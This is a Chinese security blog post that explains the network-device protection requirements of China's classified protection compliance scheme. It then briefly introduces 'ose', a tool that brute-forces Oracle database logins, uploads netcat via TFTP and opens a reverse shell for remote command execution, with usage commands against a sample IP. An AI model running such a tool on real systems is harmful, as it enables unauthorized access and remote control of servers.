关注蓝字 看点网络安全
Hello,亲爱的看官们,大家晚上好。
今天晚上2 cats大侠忙里偷闲的体验了一次新闻联播,谁知在看到天气预报时,瞬间整个人都感觉不好了。
原因是近期由于无外力因素,导致污染物会无法有效扩散,预示着可怕的雾霾有可能要杀回来,各位可要多多的注意健康保护啊。
回过头来,继续分享有关等保安全方面的内容。
网络安全等级保护系列(十三)
今天要聊的内容是:
6.1.2.6 网络设备防护。
本章节内容中,共有七项评测内容,其中有四项是本章节的重点部分。
1、访谈网络管理人员,了解边界和关键网络设备防护措施,边界及关键网络设备登录、验证方式的配置以及远程管理设备是否存在防止鉴别窃听的安全保护;
从内容的描述来看,主要是针对此前的安全审计、边界防护等内容进行验证工作,从而校验此前的安全工作是否真的到位。
2、访谈管理人员,网络设备的口令策略是什么;
作为本章节中第一条重点内容,此点看官们一定需要注意。
因为访问口令的安全策略氛围密码复杂度、验证频率、加密机制、数字认证及登录方式等内容。
看似简简单单的一条内容,却包含了众多方面的验证方式与考核内容,因此这点还请看官们多多注意。
3、检查边界和关键网络设备,查看是否配置了对登录用户进行身份鉴别的功能,口令设置是否有复杂度和定期修改要求;
这条内容作为与上条内容相关联的内容,表现形式为将上条内容的部分重点单独拿出来进行验证。
例如登录口令的复杂度是否做到,例如口令中是否加入了特殊字符,是否使用了大小写特性,是否使用字符+特殊符号+数字等提升安全性等。
4、检查边界和关键网络设备,是否配备了鉴别失败处理功能;
5、检查边界和关键网络设备,是否配置了对远程管理时产生的鉴别信息保护功能;
这两点与第三点一样,都是对口令策略方面的验证内容,因此不用过多描述。
不过下面两条可是再次的重点啦,各位可要了解。
6、检查边界和关键网络设备,查看是否对网络管理员登录地址进行限制;
本条内容其实理解起来,就是考验安全策略中对登录地址、登录途径方面的验证。
例如远程登录过程中,是直接通过当前终端与网络相连接,然后进入到口令主机当中,还是说需要通过多种保护路径之下,才能进入其中。不同的保护状态,将产生不同的防护级别。
7、对边界和关键网络设备进行渗透测试,通过使用各种渗透测试技术对网络设备进行渗透测试结果,验证网络设备防护能力是否合格。
作为本章节的最后一条重点,既是对此前各项询问结果的验证,同时也是对当前网络安全状态及健壮性的深刻考验。
不论此前说的天花乱坠,最终也逃不过实战验证的结果最为真实。因此看官们切记一定要真心做好安全工作,不要表现工作而贻误大事。
既然说过了今天的等保内容,那么再次将话题转向到技术分享环节来。
实现数据库与TFTP连接的工具
在昨天的内容中,我们介绍过了一款可以通过数据库来连接tftp服务的工具。
ose介绍
今天再次介绍一款同类工具,ose同样通过TFTP实现NC上传,,并使用NC创建一个随机端口来进行shell的反馈,这样就可以进行远程系统命令的执行了。
在ose工具的使用中,需要增加-t参数,对目标平台的操作系统进行指定,如支持Windows还是solaris。
工具演示
现在先来看下命令规则:
1
./ose.sh -s IP -u 用户名字典 -p 密码字典 -d sid -t 目标操作系统
参数说明:
-s:指定数据库地址;
-u:指定用户名字典;
-p:指定密码字典;
-d:指定数据库SID,就是XE;
-t:指定目标平台操作系统,支持Windows或Solaris。
2
命令:/# ./ose.sh
通过这条命令,看官们可以直接调出工具的操作参数说明。
3
命令:/# ./ose.sh -s 10.10.10.130 -u sys -p mima1234 -d XE -t Windows
再次使用命令后,开始对数据库进行相关操作。
好啦,今天的分享到此为止,由于临时有事,内容有些仓促,还请各位看官见谅。
2cats 寄语
老规矩不变,
如果有任何问题依旧可以发给e品小顽童。
小顽童的邮箱是:
xiaowantong@epinjianghu.com。
也可以在微信公众号的下方留言,我们会及时整理反馈的。
期待各位的来信交流!
e品江湖
不失初心 不忘初衷
长按扫码 加关注!
领取专属 10元无门槛券
私享最新 技术干货